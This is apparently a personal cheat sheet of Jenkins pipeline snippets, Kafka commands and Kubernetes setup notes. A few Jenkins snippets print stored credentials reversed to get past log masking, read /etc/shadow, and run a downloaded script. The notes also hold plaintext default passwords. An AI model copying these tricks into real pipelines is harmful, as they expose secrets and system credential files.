	stage("Step #2") {
		sh "ansible --version"
	}
}
def saveToFileUrl(gitRepoUser, gitRepoName, gitFilePath, localFileName){
    final String gitUrl="https://github.net"
    String gitFileDescription = ""
    withCredentials([usernamePassword(credentialsId: 'xxxxx', passwordVariable: 'gitToken', usernameVariable: 'gitUser')]) {
        gitFileDescription = sh(script: "curl -u ${gitUser}:${gitToken} ${gitUrl}/api/v3/repos/${gitRepoUser}/${gitRepoName}/contents/${gitFilePath} | grep download_url", returnStdout: true).trim()
    }   
    
    final String urlResponse = sh(script: "curl -s ${gitFileDescription.split(" ")[1].replaceAll('"','').replaceAll(',','')}", returnStdout: true).trim()
    writeFile file: localFileName, text: urlResponse
    return urlResponse    
}

pipeline {
    agent any

    stages {
        stage('download execution script') {
            steps{
                script{
                    env.TMP_FILE_NAME = createTempFile();
                    saveToFileUrl(getGitRepoUser(), getGitRepoName(), getGitPath(), "${env.TMP_FILE_NAME}")                
                }
            }
        }        
        stage('execute script REST API test') {
            steps{
                script{
                    withCredentials([usernamePassword(credentialsId: 'yyyyy', passwordVariable: 'pass', usernameVariable: 'user')]) {
                        env.D_USER=user
                        env.D_PASS=pass
                        def exitStatus=sh(script: "sh ${env.TMP_FILE_NAME}", returnStatus: true)
                        evaluateResult(exitStatus)
                    }   
                }
            }
        }
    }
}

with credential alternative

artifactoryCredential = string(credentialsId: '4d18-aaabb-4cdffaf348', variable: 'ARTIFACTORY_TOKEN')
withCredentials([artifactoryCredential]){
  sh "echo $ARTIFACTORY_TOKEN"
}

name of the build and using parameters

pipeline {
    agent any

    stages {
        stage('check input boolean parameter') {
            when {
                expression { params.FAIL }
            }
            steps {
                sh 'cat /etc/shadow'
            }
        }
    }
    post{
        success {
            script {
            currentBuild.displayName = "$BUILD_NUMBER - Successfull Build"
            currentBuild.description = "OK"
	    currentBuild.result='SUCCESS'
            }
        }
        failure {
            script {
            currentBuild.displayName = "$BUILD_NUMBER - Failed Build"
            currentBuild.description = "NOT OK"
	    currentBuild.result='FAILURE'
            }
        }
    }
}

use "system groovy script" for updating description with multisteps

echo "my description" > job_description.txt
def currentBuild = Thread.currentThread().executable
def workspace = build.workspace
def description = new File("${workspace}/job_description.txt").text
currentBuild.setDescription(description)

jenkins read http write file from http to scp

stage("Step #3") {
		final String url="https://api.ipify.org"
		final String urlResponse = sh(script: "curl -s $url", returnStdout: true).trim()
		final String outputFile = "/var/jenkins_home/my-ip-address.txt"
		writeFile file: outputFile, text: urlResponse

	withCredentials([usernamePassword(credentialsId: '222-333-444', passwordVariable: 'MY_SSH_PASS', usernameVariable: 'MY_SSH_USER')]) {
		final String host="localhost"
		final String outputFileName="my-host-ip"
		
		// final String command="sshpass -p " +MY_SSH_PASS+ " scp " +outputFile+ " " +MY_SSH_USER+ "@" +host+ ":~/" +outputFileName
		// final String command="sshpass -p $MY_SSH_PASS scp $outputFile $MY_SSH_USER@$host:~/$outputFileName"
		final String command="sshpass -p ${MY_SSH_PASS} scp ${outputFile} ${MY_SSH_USER}@${host}:~/${outputFileName}"
		sh(command)
		sh("rm $outputFile")
		}
      }

jenkins git timeout

checkout([$class: 'GitSCM', branches: [[name: "*/$branch"]], doGenerateSubmoduleConfigurations: false, extensions: [[$class: 'GitLFSPull', timeout: 30], [$class: 'CloneOption', depth: 0, timeout: 30], [$class: 'CheckoutOption', timeout: 30]], submoduleCfg: [], userRemoteConfigs: [[credentialsId: 'a0e5424f-2ffb-', url: '$CC_GIT_CREDENTIAL']]])

jenkins job DSL user input, build with parameters


	if (isGitBranch('OPM-integration-test')) {
            stage('candidate-git-label') {
                lastCommit = sh(returnStdout: true, script: "git log -n 1 --pretty=format:'%h'").trim()
                print(lastCommit)
                def newVersion = readVersion()
                print("this is new version: $newVersion")
            }
            stage('candidate-deploy') {
                mvn('org.apache.tomcat.maven:tomcat7-maven-plugin:2.2:redeploy -Dmaven.tomcat.url=http://host:9090/manager/text -Dtomcat.username=root -Dtomcat.password=root -DskipTests ')
            }
		}

--------------
def readVersion() {
  try {
    timeout(time: 20, unit: 'MINUTES') {
        def keep = input message: 'New version of application:',
                    parameters: [stringParam(defaultValue: "2018.06.00.00-SNAPSHOT", description: 'new application version', name: 'currentBuildVersion')]
        return keep
    }
  } catch(e) {
    return "2018.06.00.00-SNAPSHOT"
  }
}

jenkins job DSL frame for env.BRANCH_NAME<->build step

	needToExecuteStage('build', {
            mvn('-U clean package -Dmaven.javadoc.skip=true')
	})

        needToExecuteStage('deploy nexus', {
            mvn('-U deploy -Dmaven.javadoc.skip=true -Dbuild.number=${GIT_BRANCH}-#${BUILD_NUMBER}')
	})

        needToExecuteStage('sonar', {
            mvn('sonar:sonar -Psonar-test')
	})

        needToExecuteStage('integration tests', {
            mvn('install -DskipTests -DskipITs=false -Pintegration-tests,dev -Dheadless=1')
        })

        needToExecuteStage('git label', {
            def newVersion = readVersion()
            print(">-> deploy application with new version: $newVersion")
            sh( script: "git checkout $BRANCH_NAME ")
            def remoteUrl = sh(returnStdout: true, script: "git config --get remote.origin.url ")
            sh( script: "git remote set-url origin $remoteUrl ")
            sh(script: "echo $newVersion > opm-gui/src/main/webapp/META-INF/commit ")
            sh(script: "git rev-parse HEAD >> opm-gui/src/main/webapp/META-INF/commit ")
            sh( script: "git tag -a $newVersion -m 'deployment_jenkins_job' ")
            sshagent (credentials: ['git_jenkins']) {
                 sh("git push --tags $remoteUrl")
            }
            mvn ("versions:set -DnewVersion=$newVersion")
            mvn ("-N versions:update-child-modules")
            mvn ("clean install -DskipTests=true")
		})

        needToExecuteStage('deploy tomcat', {
            mvn('org.apache.tomcat.maven:tomcat7-maven-plugin:2.2:redeploy -Dmaven.tomcat.url=http://v337:9090/manager/text -Dtomcat.username=root -Dtomcat.password=root -DskipTests ')
        })

// -------------------------------------------
def executeStage(needToExecute, stageName, func){
    if(needToExecute){
        stage(stageName){
            func()
        }
    }
}

def needToExecuteStage(stageName, func){
    def decisionTable = [
             'release' : ["build": true,  "deploy nexus": true,  "sonar": false, "integration tests": true,  "git label": true,  "deploy tomcat": false]
            ,'develop' : ["build": true,  "deploy nexus": true,  "sonar": true,  "integration tests": true,  "git label": false, "deploy tomcat": true ]
            ,'feature' : ["build": true,  "deploy nexus": false, "sonar": false, "integration tests": true,  "git label": false, "deploy tomcat": false]
            ,'master'  : ["build": true,  "deploy nexus": true,  "sonar": false, "integration tests": true,  "git label": false, "deploy tomcat": false]
,'integration-test': ["build": true,  "deploy nexus": true,  "sonar": false, "integration tests": true,  "git label": false, "deploy tomcat": false]
    ]

    def branchName = env.BRANCH_NAME
    if(decisionTable[branchName]!=null){
        executeStage(decisionTable[branchName][stageName], stageName, func)
        return
    }

    for ( def key in decisionTable.keySet()){
        if(branchName.startsWith(key)){
            executeStage(decisionTable[key][stageName], stageName, func)
            return
        }
    }
}

groovy escape quotes

String input = "this ain't easy"
String escaped = "'" + input.replaceAll(/'/, /'"'"'/) + "'"
println escaped
// 'this ain'"'"'t easy'
sh "mycommand --input ${escaped}"

groovy random groovy variables

// variable inside jenkins pipeline

pipeline {
    agent any

    environment {
        TMP_FILE_NAME = "kom.yaml"+"${Math.abs(new Random().nextInt(99999))}"
    }

    stages {
        stage('read from git write to cluster') {
            steps {
                echo "----- ${env.TMP_FILE_NAME}"                    

                script {
                    env.TMP_FILE_NAME2 = "second variable"
                }
                echo "----- ${env.TMP_FILE_NAME2}"                    

            }
        }
    }

}

groovy pipeline show credentials

// create pipeline with groovy script

/**
Jenkins Pipeline (create project Pipeline) script for printing out credentials 
# jenkins show credentials 
*/
def show(){
    withCredentials([sshUserPrivateKey(credentialsId: 'xxx-yyy-883a-38881320d606', keyFileVariable: 'data_api_key', passphraseVariable: '', usernameVariable: 'data_api_username')]) {
        return "\n>>>  data_api_key ${data_api_key} \n data_api_username: ${data_api_username}"
    }
    withCredentials([usernamePassword(credentialsId: 'xxx-yyy-a659-b54d73eec29a', passwordVariable: 'database_password', usernameVariable: 'database_user')]) {
        return " \nlogin ${database_user} \npassword ${database_password}"
    }
}

pipeline {
    agent any

    stages {
        stage('show me') {
            steps {
                echo "-----"
                echo show().reverse()
                echo "-----"
            }
        }
    }
}

// # echo "gts-pd-sergtsop" | rev

pipeline with bash script and specific agent

pipeline {
    agent { label 'agent-maven-python-git-ansible' }

    stages {
        stage('print message ') {
            steps {
                echo 'Hello World'
            }
        }
        stage('print ansible version'){
            steps {
                sh 'ansible-playbook --version'
            }
        }
    }
}

condition for step

...
  stage('Action') {
        if (env.CUSTOM_VARIABLE ==~ /(?i)(Y|YES|T|TRUE|ON|RUN)/) {
	 ...

show accessible environment jenkins variables

$JENKINS_URL/env-vars.html/

REST API

check connection

JENKINS_URL=https://jenkins-stg.dpl.org
curl -sg "$JENKINS_URL/api/json?tree=jobs[name,url]" --user $DXC_USER:$DXC_PASS

deploy with parameters

# obtain list of parameters: $JENKINS_URL/job/application/job/data-api/job/deployment/job/deploy-services/api/json?pretty=true
curl $JENKINS_URL/job/application/job/data-api/job/deployment/job/deploy-services/buildWithParameters \
  --user $DXC_USER:$DXC_PASS \
  --data BRANCH_NAME=master \
  --data DESTINATION=stg-6 \
  --data DEBUG=true  \
  --data DEPLOY_DATA_APIDEBUG=true  

job information

curl -sg "$JENKINS_URL/job/application/job/data-portal/job/deployment/job/deploy-from-branch-3/244/api/json" --user $DXC_USER:$DXC_PASS
curl -sg "$JENKINS_URL/job/application/job/data-portal/job/deployment/job/deploy-from-branch-3/244/api/json?tree" --user $DXC_USER:$DXC_PASS
curl -sg "$JENKINS_URL/job/application/job/data-portal/job/deployment/job/deploy-from-branch-3/api/json?tree=allBuilds[number,url]" --user $DXC_USER:$DXC_PASS

job full log output

curl -sg "$JENKINS_URL/job/application/job/data-portal/job/deployment/job/deploy-from-branch-3/244/consoleFull" --user $DXC_USER:$DXC_PASS

sonar management

obtaining

wget https://sonarsource.bintray.com/Distribution/sonarqube/

start/stop/status

/dev/sonar/bin/linux-x86-64/sonar.sh start
/dev/sonar/bin/linux-x86-64/sonar.sh status
/dev/sonar/bin/linux-x86-64/sonar.sh stop

sonar

url: http://host01:9000
login: admin
passw: admin

print all accessible variables

echo sh(returnStdout: true, script: 'env')

plugins

plugin manual installation

copy jpi/hpi file into {JENKINS_HOME/plugins}

plugin manual removing

remove the jpi/hpi file from {JENKINS_HOME}/plugins

list all accessible plugins

https://{jenkins-url}/pluginManager/api/xml?depth=1
emailext body: mailNotification.toString(), subject: "notification", to: env.mail_recipients, mimeType: "text/plain"

email for bash script

if [[ -n $status_error ]]; then
    echo "need to be considered"
    exit 1
fi

Post-build Actions -> E-Mail Notification -> Send e-mail for every unstable build

Issues

ERROR: script not yet approved for use

http://localhost:9090/scriptApproval/

withMaven(jdk: 'jdk8', maven: 'mvn-325', mavenSettingsConfig: 'paps-maven-settings') {

jdk with name "jdk8" should be configured: http://localhost:9090/configureTools/
maven with name "mvn-325" should be configured: http://localhost:9090/configureTools/

Could not find the Maven settings.xml config file id:paps-maven-settings. Make sure it exists on Managed Files

plugin should be present
http://localhost:9090/configfiles/

RSA key fingerprint is SHA256:xxxxxx Are you sure you want to continue connecting (yes/no) ? ssh://[email protected]:7999/pportal/commons.git

change 
gitHostUrl = "https://[email protected]/scm"

Workspace sharing between runs

execute shell

echo "---------------"
ls -la current-date.txt || echo "."
cat current-date.txt || echo "."
readlink -f current-date.txt
pwd
date > current-date.txt
ls -la current-date.txt
echo "---------------"

output

[EnvInject] - Loading node environment variables.
Building on master in workspace /var/lib/jenkins/jobs/application/jobs/data-api/jobs/test/jobs/test-project/workspace
[workspace] $ /bin/sh -xe /tmp/jenkins908209539931105022.sh
+ echo ---------------
---------------
+ ls -la current-date.txt
-rw-r--r--. 1 1001 root 29 Feb  8 10:08 current-date.txt
+ cat current-date.txt
Tue Feb  8 10:08:39 UTC 2022
+ readlink -f current-date.txt
/var/lib/jenkins/jobs/application/jobs/data-api/jobs/test/jobs/test-project/workspace/current-date.txt
+ pwd
/var/lib/jenkins/jobs/application/jobs/data-api/jobs/test/jobs/test-project/workspace
+ date
+ ls -la current-date.txt
-rw-r--r--. 1 1001 root 29 Feb  8 10:13 current-date.txt
+ echo ---------------
---------------
Finished: SUCCESS

Kafka cheat sheet

position in architecture

graph

m[messaging]

pc[producer  -- one --> consumer]
ps[publisher -- many --> subscriber]

pc --extends-->m
ps --extends-->m


Kafka guarantees

  • messages sent into a particular topic will be appended in the same order
  • a consumer sees messages in the order they were written
  • "At-least-once" message delivery is guaranteed - for a consumer that crashed before it committed the offset
  • "At-most-once" delivery - ( custom implementation ) the consumer will never read the same message again, even if it crashed before processing it

Best practice

  • it is better to have many small messages instead of one big one
  • Integration tests should use real-world messages
git clone https://github.com/apache/kafka.git kafka

or kafka download

main concepts

  • Topics category of messages, consists of Partitions
  • Partition ( Leader and Followers ) part of the Topic; can be replicated (replication factor) across Brokers; has exactly one Leader and 0..* Followers. When you save a message it goes into one of the partitions, chosen by: explicit partition number | hash of the key | round robin
    partition size calculator
    partitions
  • Leader main partition in a certain period of time; holds the InSyncReplica list - Followers that are alive at the current time
  • Committed Messages a message written by all InSyncReplicas; a Consumer can read it only after that, a Producer can wait for it or not
  • Brokers one of the servers of Kafka ( one of the servers of the cluster )
  • Producers a process that publishes messages into a specific topic
  • Consumers topic subscribers
  • Consumer Group group of consumers with one load balancer per group; consumer instances from different groups each receive their own copy of a message ( one message per group )

concepts
workflow
consumer
consumer
consumer group
producer
partitions
recommendations

Error Handling

consumer messages processing

code examples

At most once

offset controlled by timer

enable.auto.commit=true;     # Kafka would auto commit offset at the specified interval.
# !!! do not make call to consumer.commitSync(); from the consumer. With this configuration of consumer, 
auto.commit.interval.ms=1;   # set it to lower timeframe

At-least-once

offset controlled by broker. Duplicate message delivery can happen in the following scenario: the consumer processes a message and commits it into its own persistent store, but crashes before committing the offset to the Kafka broker - on restart it reads the same message again. quarkus.kafka-streams.processing-guarantee=at_least_once

enable.auto.commit=false  #  enable.auto.commit=true and auto.commit.interval.ms=999999999999999
# consumer.commitSync(); # After reading. Consumer should now then take control of the message offset commits
sequenceDiagram

broker ->> consumer:  read message A315

consumer ->> processing:  process message
processing -->> consumer: done

consumer --> consumer: commitSync 

destroy consumer
processing -x consumer: die

broker ->> broker: no response
sequenceDiagram

broker ->> consumer:  read message A315 ( duplication )

consumer ->> processing:  process message A315
processing -->> consumer: done

consumer -->> consumer: commitSync

consumer -->> broker: commit offset

broker ->> consumer:  read message A316
consumer ->> processing:  process message A316


Exactly once

offset controlled by the consumer in external storage. quarkus.kafka-streams.processing-guarantee=exactly_once # exactly_once_v2

enable.auto.commit=false
# !!! do not make call to consumer.commitSync(); 
# use new KafkaConsumer<String, String>(props).subscribe("topic", ConsumerRebalancerListener)

flowchart RL
c --o cs[Consumer]
of[OffsetManager] --o c[ConsumerRebalancerListener]
of <-.->|rw| es[offset 
                ExternalStorage ]

SQL   -->|extends| es
NoSQL -->|extends| es
Kafka[Kafka 
     exactly_once_v2] -->|extends| es

ZooKeeper ( one instance per cluster )

  • must be started before using Kafka ( zookeeper-server-start.sh, kafka-server-start.sh )
  • cluster membership
  • electing a controller
  • topic configuration leader, which topic exists
  • Quotas
  • ACLs
    ./kafka-acls.sh ( see example below )
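
a hedged example of adding an ACL with the classic ZooKeeper-based authorizer ( principal and topic names are placeholders ):

bin/kafka-acls.sh --authorizer-properties zookeeper.connect=localhost:2181 \
  --add --allow-principal User:alice \
  --operation Read --operation Write \
  --topic mytopic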

scripts

start Kafka's Broker

zookeeper-server-start.sh config/zookeeper.properties
kafka-server-start.sh config/server.properties

ksql

flowchart LR

ksql --> ks["kafka \n stream"]
ks --> cp[consumer\nproducer]
@startuml

[ksql] as ksql 
rectangle "kafka stream jar" as stream #lightgreen
[app]  as app 

[consumer \n producer] as consumer
[kafka] as kafka

ksql -right--> stream : use
app o-- stream  : aggregate

stream -right--> consumer
consumer -up-> kafka

@enduml

ksql ( MapR )

create stream

# create stream
maprcli stream create -path sample-stream -produceperm p -consumeperm p -topicperm p

# generate dummy data 
/opt/mapr/ksql/ksql-4.1.1/bin/ksql-datagen quickstart=pageviews format=delimited topic=sample-stream:pageviews  maxInterval=5000

create table for stream

/opt/mapr/ksql/ksql-4.1.1/bin/ksql http://ubs000130.vantage.org:8084

ksqldb what is

it is a storage of messages with the ability to look into a window ( time based ) using Confluent KSQL

ksqldb pillars

  • stream processing
  • connectors
  • materialized views

ksqldb queries

  • pull query
  • push query
create table pageviews_original_table (viewtime bigint, userid varchar, pageid varchar) with (kafka_topic='sample-stream:pageviews', value_format='DELIMITED', key='viewtime')
select * from pageviews_original_table;

topic create

bin/kafka-topics.sh --create --zookeeper localhost:2181 --replication-factor 1 --partitions 1 --topic mytopic
bin/kafka-topics.sh --create --zookeeper localhost:2181 --replication-factor 1 --partitions 1 --describe --topic mytopic
bin/kafka-topics.sh --create --zookeeper localhost:2181 --replication-factor 1 --partitions 1 --config retention.ms=360000 --topic mytopic

or just enable "autocreation"

auto.create.topics.enable=true

topic delete

can be marked "for deletion"

bin/kafka-topics.sh --delete --zookeeper localhost:2181 --topic mytopic

topics list

bin/kafka-topics.sh --list --zookeeper localhost:2181

topics describe

kafka-topics --describe --zookeeper localhost:2181 --topic mytopicname

topic update

bin/kafka-topics.sh --alter --zookeeper localhost:2181 --partitions 5 --topic mytopic
bin/kafka-topics.sh --alter --zookeeper localhost:2181 --topic mytopic --config retention.ms=72000
bin/kafka-topics.sh --alter --zookeeper localhost:2181 --topic mytopic --deleteConfig retention.ms=72000
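
the effective per-topic overrides can be verified with kafka-configs.sh ( a sketch using the same ZooKeeper-style flags as above ):

bin/kafka-configs.sh --zookeeper localhost:2181 --entity-type topics --entity-name mytopic --describe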

producer console

bin/kafka-console-producer.sh --broker-list localhost:9092 --topic mytopic

PRODUCER_CONFIG=/path/to/config.properties
TOPIC_NAME=my-topic
BROKER=192.168.1.140:9988
bin/kafka-console-producer.sh --producer.config $PRODUCER_CONFIG \
--broker-list $BROKER --topic $TOPIC_NAME

java producer example

 Properties props = new Properties();
 props.put("bootstrap.servers", "localhost:4242");
 props.put("acks", "all");  // 0 - no wait; 1 - leader write into local log; all - leader write into local log and wait ACK from full set of InSyncReplications 
 props.put("client.id", "unique_client_id"); // nice to have
 props.put("retries", 0);           // can change ordering of the message in case of retriying
 props.put("batch.size", 16384);    // collect messages into batch
 props.put("linger.ms", 1);         // additional wait time before sending batch
 props.put("compression.type", ""); // type of compression: none, gzip, snappy, lz4
 props.put("buffer.memory", 33554432);
 props.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer");
 props.put("value.serializer", "org.apache.kafka.common.serialization.StringSerializer");
 Producer<String, String> producer = new KafkaProducer<>(props);
 producer.metrics(); // 
 for(int i = 0; i < 100; i++) {
     producer.send(new ProducerRecord<String, String>("mytopic", Integer.toString(i), Integer.toString(i)));
 }
 producer.flush(); // immediately send, even if 'linger.ms' is greater than 0
 producer.close();
 producer.partitionsFor("mytopic");

partition will be selected

Consumer

consumer console ( console consumer )

bin/kafka-console-consumer.sh --zookeeper localhost:2181 --topic mytopic --from-beginning
bin/kafka-console-consumer.sh --zookeeper localhost:2181 --topic mytopic --from-beginning --consumer.config my_own_config.properties

bin/kafka-console-consumer.sh --bootstrap-server mus07.mueq.adac.com:9092 --new-consumer --topic session-ingest-stage-1 --offset 20 --partition 0  --consumer.config kafka-log4j.properties
bin/kafka-console-consumer.sh --bootstrap-server mus07.mueq.adac.com:9092 --group my-consumer-2 --topic session-ingest-stage-1 --from-beginning  --consumer.config kafka-log4j.properties

# read information about partitions
java kafka.tools.GetOffsetShell --broker-list musnn071001:9092 --topic session-ingest-stage-1
# get number of messages in partitions, partitions messages count
bin/kafka-run-class.sh kafka.tools.GetOffsetShell --broker-list localhost:9092 --topic session-ingest-stage-1
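
GetOffsetShell prints one topic:partition:offset line per partition, so the total number of messages in a topic can be approximated by summing the latest offsets ( a sketch on top of the command above ):

bin/kafka-run-class.sh kafka.tools.GetOffsetShell --broker-list localhost:9092 --topic session-ingest-stage-1 --time -1 \
  | awk -F: '{sum += $3} END {print sum}'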

consumer group console

bin/kafka-consumer-groups.sh --zookeeper localhost:2181 --describe --group mytopic-consumer-group
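
newer Kafka versions drop the ZooKeeper flag; the same information comes directly from the broker:

bin/kafka-consumer-groups.sh --bootstrap-server localhost:9092 --list
bin/kafka-consumer-groups.sh --bootstrap-server localhost:9092 --describe --group mytopic-consumer-group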

consumer offset

  • automatic commit offset (enable.auto.commit=true) with period (auto.commit.interval.ms=1000)
  • manual offset commit (enable.auto.commit=false)
  • property "auto.offset.reset=latest" start with consuming only newly appeared messages in the topic after connection/creation
 Properties props = new Properties();
 props.put("bootstrap.servers", "localhost:4242"); // list of host/port pairs to connect to cluster
 props.put("client.id", "unique_client_id");       // nice to have
 props.put("group.id", "unique_group_id");         // nice to have
 props.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer");
 props.put("value.serializer", "org.apache.kafka.common.serialization.StringSerializer");
 props.put("fetch.min.bytes", 0);              // if value 1 - will be fetched immediatelly
 props.put("enable.auto.commit", "true");      //
 // timeout of detecting failures of consumer, Kafka group coordinator will wait for heartbeat from consumer within this period of time
 props.put("session.timeout.ms", "1000"); 
 // expected time between heartbeats to the consumer coordinator,
 // keeps the consumer session active, 
 // facilitate rebalancing when new consumers join/leave group,
 // must be set lower than *session.timeout.ms*
 props.put("heartbeat.interval.ms", "");

consumer java

NOT THREAD Safe !!!

KafkaConsumer<String, String> consumer = new KafkaConsumer<>(props);
ConsumerRecords<String, String> records = consumer.poll(100); // time in ms

consumer consume messages

  • by topic
consumer.subscribe(Arrays.asList("mytopic_1", "mytopic_2"));
  • by partition
TopicPartition partition0 = new TopicPartition("mytopic_1", 0);
TopicPartition partition1 = new TopicPartition("mytopic_1", 1);
consumer.assign(Arrays.asList(partition0, partition1));
  • seek to position
seek(partition0, 1024);
seekToBeginning(partition0, partition1);
seekToEnd(partition0, partition1);

Kafka Stream State Stores

:TODO: in-memory DB ( Rocks DB )

Kafka connect

  • manage copying data between Kafka and another system
  • connector either a source or a sink
  • connector can split "job" to "tasks" ( to copy subset of data )
  • partitioned streams for source/sink, each record into it: [key,value,offset]
  • standalone/distributed mode
  • Two ways of working with Streams:
    • KSQL (KSQLDB)
    • Flink

      engine for running queries on cluster

Kafka connect standalone

start connect

bin/connect-standalone.sh config/connect-standalone.properties config/connect-file-source.properties

connect settings

name=local-file-source
connector.class=org.apache.kafka.connect.file.FileStreamSourceConnector
tasks.max=1
file=my_test_file.txt
topic=topic_for_me

after execution you can check the topic

bin/kafka-console-consumer.sh --zookeeper localhost:2181 --topic topic_for_me --from-beginning
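
a complementary sink connector ( a sketch using the stock FileStreamSink class shipped with Kafka: it writes records from the topic back into a local file; file names are placeholders ):

cat > config/connect-file-sink.properties <<'EOF'
name=local-file-sink
connector.class=org.apache.kafka.connect.file.FileStreamSinkConnector
tasks.max=1
file=my_output_file.txt
topics=topic_for_me
EOF
bin/connect-standalone.sh config/connect-standalone.properties config/connect-file-sink.properties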

additional tools

kafka cli (producer & consumer)

installation

apt-get install kafkacat

docker run

docker run -it --network=host edenhill/kcat:1.7.1

commands

minimal command
BROKER_HOST=192.168.1.150
BROKER_PORT=3388
TOPIC=my-topic
kafkacat -C -b $BROKER_HOST:$BROKER_PORT -t $TOPIC
# -X security.protocol=sasl_ssl \
# -X sasl.mechanisms=PLAIN      \
# -X sasl.username=$SASL_USER   \
# -X sasl.password=$SASL_PASS   \
read all messages, read messages from the beginning
kafkacat -C -b $BROKER_HOST:$BROKER_PORT -t $TOPIC -o beginning

read last messages, read messages from the end

kafkacat -C -b $BROKER_HOST:$BROKER_PORT -t $TOPIC -o -5

Consume messages and stop

kafkacat -C -b $BROKER_HOST:$BROKER_PORT -t $TOPIC -c 5
# Print messages with a specific output
kafkacat -C -b $BROKER_HOST:$BROKER_PORT -t $TOPIC -c 5 -f 'Key: %k, message: %s \n'
# more complex output
kafkacat -C -b $BROKER_HOST:$BROKER_PORT -t $TOPIC -c 5 -f '\nKey (%K bytes): %k\t\nValue (%S bytes): %s\nTimestamp: %T\tPartition: %p\tOffset: %o\nHeaders: %h\n--\n' -e

read messages in the time range, read messages between two datetimes

# kafkacat expects s@/e@ offsets as unix timestamps in milliseconds
date_start=$(date +%s%3N --date="2 hour ago")
date_end=$(date +%s%3N)

kafkacat -C -b $BROKER_HOST:$BROKER_PORT -t $TOPIC -o s@$date_start -o e@$date_end

read key of the message

kafkacat -C -b $BROKER_HOST:$BROKER_PORT -t $TOPIC -K\t

read message with specific key

kafkacat -C -b $BROKER_HOST:$BROKER_PORT -t $TOPIC -o beginning -K\t | grep $MESSAGE_KEY
# shrink time of the scan from "beginning" to something more expected

write/produce message

kafkacat -P -b $BROKER_HOST:$BROKER_PORT -t $TOPIC -l /path/to/file
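
producing a single keyed message from stdin ( a sketch; -K sets the key delimiter for producing just as it does for consuming ):

# key and value are placeholders
echo "my-key:my-value" | kafkacat -P -b $BROKER_HOST:$BROKER_PORT -t $TOPIC -K: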

Kubernetes cheat sheet

useful links

tutorials

local playgrounds

remote playground and examples

tools

kubectl installation

curl -LO https://storage.googleapis.com/kubernetes-release/release/v1.17.4/bin/linux/amd64/kubectl
curl -LO https://storage.googleapis.com/kubernetes-release/release/v1.18.0/bin/linux/amd64/kubectl
  • kubectl autocompletion
source <(kubectl completion bash)
# source <(kubectl completion zsh)

or

# source /usr/share/bash-completion/bash_completion
kubectl completion bash >/etc/bash_completion.d/kubectl
  • trace logging
rm -rf ~/.kube/cache
kubectl get pods -v=6
kubectl get pods -v=7
kubectl get pods -v=8
# with specific context file from ~/.kube, specific config
kubectl --kubeconfig=config-rancher  get pods -v=8
  • explain yaml schema
kubectl explain pods
kubectl explain pods --recursive
kubectl explain pods --recursive --api-version=autoscaling/v2beta1
  • python client
pip install kubernetes

architecture architecture architecture nodes with software kubernetes


workflow

deployment workflow

  1. The user deploys a new app by using the kubectl CLI. Kubectl sends the request to the API server.
  2. The API server receives the request and stores it in the data store (etcd). After the request is written to the data store, the API server is done with the request.
  3. Watchers detect the resource changes and send notifications to the Controller to act on those changes.
  4. The Controller detects the new app and creates new pods to match the desired number of instances. Any changes to the stored model will be used to create or delete pods.
  5. The Scheduler assigns new pods to a node based on specific criteria. The Scheduler decides on whether to run pods on specific nodes in the cluster. The Scheduler modifies the model with the node information.
  6. A Kubelet on a node detects a pod with an assignment to itself and deploys the requested containers through the container runtime, for example, Docker. Each node watches the storage to see what pods it is assigned to run. The node takes necessary actions on the resources assigned to it such as to create or delete pods.
  7. Kubeproxy manages network traffic for the pods, including service discovery and load balancing. Kubeproxy is responsible for communication between pods that want to interact.
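
the flow can be observed from the CLI ( a sketch with a throw-away deployment; the name is arbitrary ):

# steps 1-2: submit a new app through the API server
kubectl create deployment hello --image=k8s.gcr.io/echoserver:1.4
# steps 3-5: controller and scheduler react; watch the resulting events
kubectl get events --sort-by=.metadata.creationTimestamp | tail
# step 6: the kubelet runs the pod; check which node it was scheduled to
kubectl get pods -o wide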


k3s - lightweight Kubernetes distribution for resource-constrained environments ( IoT, Edge, local sandbox ). Installation helpers:

  • K3D
  • k3sup
  • kubevip

microk8s

installation

sudo snap install microk8s --classic
sudo snap install microk8s --classic --edge 

enable addons

microk8s.start
microk8s.enable dns dashboard

check installation

microk8s.inspect

check journals for services

journalctl -u snap.microk8s.daemon-docker
  • snap.microk8s.daemon-apiserver
  • snap.microk8s.daemon-controller-manager
  • snap.microk8s.daemon-scheduler
  • snap.microk8s.daemon-kubelet
  • snap.microk8s.daemon-proxy
  • snap.microk8s.daemon-docker
  • snap.microk8s.daemon-etcd

minikube

installation from snap

sudo snap install minikube

installation from release

curl -Lo minikube https://storage.googleapis.com/minikube/releases/latest/minikube-linux-amd64 && chmod +x minikube
curl -Lo kubectl https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/linux/amd64/kubectl && chmod +x kubectl

export MINIKUBE_WANTUPDATENOTIFICATION=false
export MINIKUBE_WANTREPORTERRORPROMPT=false
export MINIKUBE_HOME=$HOME
export CHANGE_MINIKUBE_NONE_USER=true
mkdir $HOME/.kube || true
touch $HOME/.kube/config

# default kubernetes config file location
export KUBECONFIG=$HOME/.kube/config
sudo -E ./minikube start --vm-driver=none

# wait until Minikube has been created
for i in {1..150}; do # timeout for 5 minutes
   ./kubectl get po &> /dev/null
   if [ $? -ne 1 ]; then
      break
  fi
  sleep 2
done

set up env

minikube completion bash

start

minikube start

uninstall kube, uninstall kubectl, uninstall minikube

kubectl delete node --all
kubectl delete pods --all
minikube stop
minikube delete

launchctl stop '*kubelet*.mount'
launchctl stop localkube.service
launchctl disable localkube.service

sudo kubeadm reset
## network cleaining up 
# sudo ip link del cni0
# sudo ip link del flannel.1
# sudo systemctl restart network

rm -rf ~/.kube ~/.minikube
sudo rm -rf /usr/local/bin/localkube /usr/local/bin/minikube
sudo rm -rf /etc/kubernetes/

# sudo apt-get purge kubeadm kubectl kubelet kubernetes-cni kube*
sudo apt-get purge kube*
sudo apt-get autoremove

docker system prune -af --volumes

start without VirtualBox/KVM

export MINIKUBE_WANTUPDATENOTIFICATION=false
export MINIKUBE_WANTREPORTERRORPROMPT=false
export MINIKUBE_HOME=$HOME
export CHANGE_MINIKUBE_NONE_USER=true

export KUBECONFIG=$HOME/.kube/config
sudo -E minikube start --vm-driver=none

kubectl using minikube context

permanently

kubectl config use-context minikube

temporary

kubectl get pods --context=minikube

example of started kube processes

/usr/bin/kubelet 
    --bootstrap-kubeconfig=/etc/kubernetes/bootstrap-kubelet.conf 
    --kubeconfig=/etc/kubernetes/kubelet.conf 
    --config=/var/lib/kubelet/config.yaml 
